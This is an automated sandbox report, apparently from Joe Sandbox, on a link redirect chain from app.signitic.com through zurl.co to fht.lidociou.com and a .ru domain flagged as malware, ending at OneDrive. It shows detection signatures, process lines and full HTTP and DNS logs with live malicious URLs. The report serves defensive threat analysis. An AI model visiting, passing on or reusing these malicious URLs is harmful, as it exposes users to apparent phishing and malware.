Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
https://app.signitic.com/l/aWRMVnlrQ0g4NXZzVTh6eGpEV2N6UT09-MG1ORVZRQWgwZXZXZVQwS3pYcjdDdz09

Overview

General Information

Sample URL:https://app.signitic.com/l/aWRMVnlrQ0g4NXZzVTh6eGpEV2N6UT09-MG1ORVZRQWgwZXZXZVQwS3pYcjdDdz09
Analysis ID:1573138
Infos:

Detection

Score:48
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Detected suspicious crossdomain redirect
Stores files to the Windows start menu directory

Classification

  • System is w10x64_ra
  • chrome.exe (PID: 2084 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank" MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
    • chrome.exe (PID: 6636 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2212 --field-trial-handle=1956,i,15815528503565354663,14100251185342758663,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
  • chrome.exe (PID: 6480 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" "https://app.signitic.com/l/aWRMVnlrQ0g4NXZzVTh6eGpEV2N6UT09-MG1ORVZRQWgwZXZXZVQwS3pYcjdDdz09" MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
  • cleanup
No configs have been found
No yara matches
No Sigma rule has matched
No Suricata rule has matched

Click to jump to signature section

Show All Signature Results

AV Detection

barindex
Source: https://ic3tm8fvmojrxm3ckq3pnid4ifsnn1sfw7p2umpbo0wkfxthgllk7e.ezmbsgzm.ru/GYBrLQVgjFNpAAeCNlxgZEUdgeRBHHRSZOUCERPJKVKBUNXOZCFFBQYMJKGSEABHAPBEGCPEJQHOWXNRIAvira URL Cloud: Label: malware
Source: https://fht.lidociou.com/lrjqM/HTTP Parser: No favicon
Source: C:\Program Files\Google\Chrome\Application\chrome.exeHTTP traffic: Redirect from: app.signitic.com to https://zurl.co/upuu
Source: C:\Program Files\Google\Chrome\Application\chrome.exeHTTP traffic: Redirect from: onedrive.live.com to https://www.microsoft.com/microsoft-365/onedrive/online-cloud-storage
Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknownTCP traffic detected without corresponding DNS query: 192.229.211.108
Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknownTCP traffic detected without corresponding DNS query: 20.189.173.10
Source: unknownTCP traffic detected without corresponding DNS query: 20.189.173.10
Source: unknownTCP traffic detected without corresponding DNS query: 20.189.173.10
Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknownTCP traffic detected without corresponding DNS query: 20.189.173.10
Source: unknownTCP traffic detected without corresponding DNS query: 192.229.211.108
Source: unknownTCP traffic detected without corresponding DNS query: 20.189.173.10
Source: unknownTCP traffic detected without corresponding DNS query: 192.229.211.108
Source: unknownTCP traffic detected without corresponding DNS query: 192.229.211.108
Source: unknownTCP traffic detected without corresponding DNS query: 192.229.211.108
Source: unknownTCP traffic detected without corresponding DNS query: 192.229.211.108
Source: unknownTCP traffic detected without corresponding DNS query: 20.189.173.10
Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknownTCP traffic detected without corresponding DNS query: 192.229.211.108
Source: unknownTCP traffic detected without corresponding DNS query: 20.189.173.10
Source: unknownTCP traffic detected without corresponding DNS query: 192.229.211.108
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global trafficHTTP traffic detected: GET /l/aWRMVnlrQ0g4NXZzVTh6eGpEV2N6UT09-MG1ORVZRQWgwZXZXZVQwS3pYcjdDdz09 HTTP/1.1Host: app.signitic.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /uPUU HTTP/1.1Host: zurl.coConnection: keep-aliveUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentsec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /lrjqM/ HTTP/1.1Host: fht.lidociou.comConnection: keep-aliveUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentsec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /ajax/libs/crypto-js/4.1.1/crypto-js.min.js HTTP/1.1Host: cdnjs.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning"sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://fht.lidociou.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /turnstile/v0/api.js?render=explicit HTTP/1.1Host: challenges.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning"sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://fht.lidociou.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /jquery-3.6.0.min.js HTTP/1.1Host: code.jquery.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning"sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://fht.lidociou.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /turnstile/v0/g/f9063374b04d/api.js HTTP/1.1Host: challenges.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning"sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://fht.lidociou.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /jquery-3.6.0.min.js HTTP/1.1Host: code.jquery.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /ajax/libs/crypto-js/4.1.1/crypto-js.min.js HTTP/1.1Host: cdnjs.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /turnstile/v0/g/f9063374b04d/api.js HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/g/turnstile/if/ov2/av0/rcv/gotfg/0x4AAAAAAAbRCGJdTPdP8Ybc/auto/fbE/normal/auto/ HTTP/1.1Host: challenges.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: cross-siteSec-Fetch-Mode: navigateSec-Fetch-Dest: iframeReferer: https://fht.lidociou.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/g/orchestrate/chl_api/v1?ray=8f061c7f6a0e43aa&lang=auto HTTP/1.1Host: challenges.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/turnstile/if/ov2/av0/rcv/gotfg/0x4AAAAAAAbRCGJdTPdP8Ybc/auto/fbE/normal/auto/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/g/cmg/1 HTTP/1.1Host: challenges.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/turnstile/if/ov2/av0/rcv/gotfg/0x4AAAAAAAbRCGJdTPdP8Ybc/auto/fbE/normal/auto/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/g/cmg/1 HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/g/orchestrate/chl_api/v1?ray=8f061c7f6a0e43aa&lang=auto HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /favicon.ico HTTP/1.1Host: fht.lidociou.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://fht.lidociou.com/lrjqM/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6IkE4VDhjdXFoejc5SUkvWHRYUEIyNmc9PSIsInZhbHVlIjoic0tXZjAvSGg1THFpdktBOXJadCtVUnJiR2MzYVJ1UjdvYUVmMXpEalpYSTJrYzh0czlKczhpaGpUU3o1RzArajRpclBpWi90SUsrL1RobmkvR2tlaXJZRkpLRUdYSG11ZDdic2JyNlNiVkIzMHU4Z0dCUDJqM0JDY3Awa0Q2Tk4iLCJtYWMiOiIwZTlkZGY2YTIxZDQ4ZDM1MmRjZjA2ZTA1NjYxNzRiMzI3OTA5YjA2ZjAxOWQyYjNiNDIyOTgwMDRmM2I1MGNjIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6InVyRmtMWHN1MXdJR2NTV001SDdYZGc9PSIsInZhbHVlIjoiMDRiZXU4M28ycFFJOG9zVzVPaDZHaUFyZUdVNHVZM3RNdm1BL3RBaDhuNnhWKzRMVFVYcWdBbFkyUVIrMGthUU1PZ0xVMEV5SklHbUNxeDNaY1h4RmJOZHdLSW5FTWZtQ1ZvZXp0eFkyZlAzU0xkK2lDbzRleVZsSFRzclcxTTQiLCJtYWMiOiJkZDg1NGNhNWRjNzBkYjY0ODM5ZTk5MDExYjA1MzQwNDAzNzg2MzRiNDcwNzAwOWYyMmU3YThhODI3MTI2ODhhIiwidGFnIjoiIn0%3D
Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/g/flow/ov1/253155817:1733923695:mM-KLczH2CXphey7QIg7rQsY9Vh66LXeu-8hr5wSDxE/8f061c7f6a0e43aa/I4QnKzgsFcrsblePKpbDs_Q77AQFAQc48Yo9MGAmJgE-1733926783-1.1.1.1-QqogzN8CSnrMTMPigFQs0HNyIjjrp0QbL8ZSV6_WdiYEcGZzVpgZAsh7XUOdf5aA HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/g/i/8f061c7f6a0e43aa/1733926788305/RiSF0WxLge_mIxD HTTP/1.1Host: challenges.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/turnstile/if/ov2/av0/rcv/gotfg/0x4AAAAAAAbRCGJdTPdP8Ybc/auto/fbE/normal/auto/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/g/i/8f061c7f6a0e43aa/1733926788305/RiSF0WxLge_mIxD HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/g/pat/8f061c7f6a0e43aa/1733926788306/994b8034e574a2411887595169e207500de62f8c2bd74fbc747241d30a2e7af9/V_4VoVIq-fp0XsL HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveCache-Control: max-age=0sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/turnstile/if/ov2/av0/rcv/gotfg/0x4AAAAAAAbRCGJdTPdP8Ybc/auto/fbE/normal/auto/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/g/flow/ov1/253155817:1733923695:mM-KLczH2CXphey7QIg7rQsY9Vh66LXeu-8hr5wSDxE/8f061c7f6a0e43aa/I4QnKzgsFcrsblePKpbDs_Q77AQFAQc48Yo9MGAmJgE-1733926783-1.1.1.1-QqogzN8CSnrMTMPigFQs0HNyIjjrp0QbL8ZSV6_WdiYEcGZzVpgZAsh7XUOdf5aA HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/g/flow/ov1/253155817:1733923695:mM-KLczH2CXphey7QIg7rQsY9Vh66LXeu-8hr5wSDxE/8f061c7f6a0e43aa/I4QnKzgsFcrsblePKpbDs_Q77AQFAQc48Yo9MGAmJgE-1733926783-1.1.1.1-QqogzN8CSnrMTMPigFQs0HNyIjjrp0QbL8ZSV6_WdiYEcGZzVpgZAsh7XUOdf5aA HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /GYBrLQVgjFNpAAeCNlxgZEUdgeRBHHRSZOUCERPJKVKBUNXOZCFFBQYMJKGSEABHAPBEGCPEJQHOWXNRI HTTP/1.1Host: ic3tm8fvmojrxm3ckq3pnid4ifsnn1sfw7p2umpbo0wkfxthgllk7e.ezmbsgzm.ruConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Origin: https://fht.lidociou.comSec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://fht.lidociou.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /GYBrLQVgjFNpAAeCNlxgZEUdgeRBHHRSZOUCERPJKVKBUNXOZCFFBQYMJKGSEABHAPBEGCPEJQHOWXNRI HTTP/1.1Host: ic3tm8fvmojrxm3ckq3pnid4ifsnn1sfw7p2umpbo0wkfxthgllk7e.ezmbsgzm.ruConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: onedrive.live.comConnection: keep-aliveUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: cross-siteSec-Fetch-Mode: navigateSec-Fetch-Dest: documentsec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Referer: https://fht.lidociou.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficDNS traffic detected: DNS query: app.signitic.com
Source: global trafficDNS traffic detected: DNS query: zurl.co
Source: global trafficDNS traffic detected: DNS query: www.google.com
Source: global trafficDNS traffic detected: DNS query: fht.lidociou.com
Source: global trafficDNS traffic detected: DNS query: code.jquery.com
Source: global trafficDNS traffic detected: DNS query: challenges.cloudflare.com
Source: global trafficDNS traffic detected: DNS query: cdnjs.cloudflare.com
Source: global trafficDNS traffic detected: DNS query: a.nel.cloudflare.com
Source: global trafficDNS traffic detected: DNS query: ic3tm8fvmojrxm3ckq3pnid4ifsnn1sfw7p2umpbo0wkfxthgllk7e.ezmbsgzm.ru
Source: global trafficDNS traffic detected: DNS query: www.onedrive.com
Source: global trafficDNS traffic detected: DNS query: onedrive.live.com
Source: global trafficDNS traffic detected: DNS query: assets.onestore.ms
Source: global trafficDNS traffic detected: DNS query: ajax.aspnetcdn.com
Source: global trafficDNS traffic detected: DNS query: c.s-microsoft.com
Source: unknownHTTP traffic detected: POST /cdn-cgi/challenge-platform/h/g/flow/ov1/253155817:1733923695:mM-KLczH2CXphey7QIg7rQsY9Vh66LXeu-8hr5wSDxE/8f061c7f6a0e43aa/I4QnKzgsFcrsblePKpbDs_Q77AQFAQc48Yo9MGAmJgE-1733926783-1.1.1.1-QqogzN8CSnrMTMPigFQs0HNyIjjrp0QbL8ZSV6_WdiYEcGZzVpgZAsh7XUOdf5aA HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveContent-Length: 3214sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Content-type: application/x-www-form-urlencodedCF-Chl-RetryAttempt: 0sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36CF-Challenge: I4QnKzgsFcrsblePKpbDs_Q77AQFAQc48Yo9MGAmJgE-1733926783-1.1.1.1-QqogzN8CSnrMTMPigFQs0HNyIjjrp0QbL8ZSV6_WdiYEcGZzVpgZAsh7XUOdf5aAsec-ch-ua-platform: "Windows"Accept: */*Origin: https://challenges.cloudflare.comSec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/turnstile/if/ov2/av0/rcv/gotfg/0x4AAAAAAAbRCGJdTPdP8Ybc/auto/fbE/normal/auto/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 11 Dec 2024 14:19:49 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeCache-Control: max-age=14400Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=YlRGWgh5SJgyPrXvPyL5W5WFYijsbRb75o23PDkVIOGv4OecdJjYCSMjIG218qWuZoCWxkpFlQKHGB13%2BHcDfdQyxNmWnqb%2B3p2R7q5354dGIJLmDyOX0HSDn5Hfow%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Vary: Accept-Encodingalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=6381&min_rtt=6371&rtt_var=2409&sent=4&recv=7&lost=0&retrans=0&sent_bytes=2824&recv_bytes=2111&delivery_rate=448853&cwnd=241&unsent_bytes=0&cid=f6a420f6a8a87d41&ts=132&x=0"CF-Cache-Status: HITAge: 12398Server: cloudflareCF-RAY: 8f061ca13cef4350-EWRserver-timing: cfL4;desc="?proto=TCP&rtt=1819&min_rtt=1746&rtt_var=800&sent=4&recv=7&lost=0&retrans=0&sent_bytes=2828&recv_bytes=1895&delivery_rate=1253218&cwnd=201&unsent_bytes=0&cid=b2f286ac047b3a16&ts=484&x=0"
